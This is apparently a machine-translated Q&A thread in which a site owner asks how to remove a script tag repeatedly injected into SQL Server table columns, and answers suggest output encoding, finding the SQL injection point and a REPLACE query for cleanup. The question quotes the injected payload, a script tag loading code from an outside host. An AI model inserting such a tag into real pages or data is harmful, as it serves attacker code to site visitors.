我遇到了很大麻烦。请帮忙!!!!!!!!!!
我的网站遭到某些恶意脚本的攻击< / title> < script src = http:// google-stats50.info/ur.php>。此脚本会自动附加到某个表的任何列。我删除了这个脚本。但几个小时后,它又重新出现在一些表格中。但这一次是< / title> < script src = http:// google-stats49.info/ur.php>。
我的客户抱怨脚本。使用的技术是ASP.NET 1.1,SQL SERVER 2005。
请帮忙。
提前致谢!!!!!!
答案 0 :(得分:4)
从数据库呈现文本时,可以使用两种方法来避免使用此脚本。
Last MS Anti-XSS library now是3.1 How to using video
他们如何通过此脚本。
希望得到这个帮助。
答案 1 :(得分:2)
关闭网站。您的服务器现在可能会或可能不会被搞砸。
您必须找出更改的来源 - 数据库或文件系统
如果它是数据库,那么你可能没问题,有人可能正在使用sql注入。设置权限,以便在找到SQL INJECTION点之前,网站暂时无法更新数据库。
如果是您的文件系统,那么您可能需要清除并重置该站点。他们在,你不会摆脱他们。找到你的切入点,但这很难。
答案 2 :(得分:0)
我建议您删除IRIS中的所有外部主机头绑定。这使您可以在本地找到问题,而您的任何客户端都不会被感染/被盗
答案 3 :(得分:0)
快速补救
以下不是解决方案,但通过此方法,您可以在单个查询中从数据库中删除脚本。这就是我现在所做的事情:)。
更新Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)),'http://google-stats49.info/ur.php>','')
这个就像查找和替换单词中的内容一样。如果您发现有关病毒脚本的任何商品,请在此处发布。
此致 马苏德
答案 4 :(得分:0)
同样的问题在这里...它开始于大约15.30并且感染了4个表...这里是完整数据库搜索的解决方案:http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html只需编辑它以返回不同的表名。
这将作为马苏德提及
UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '')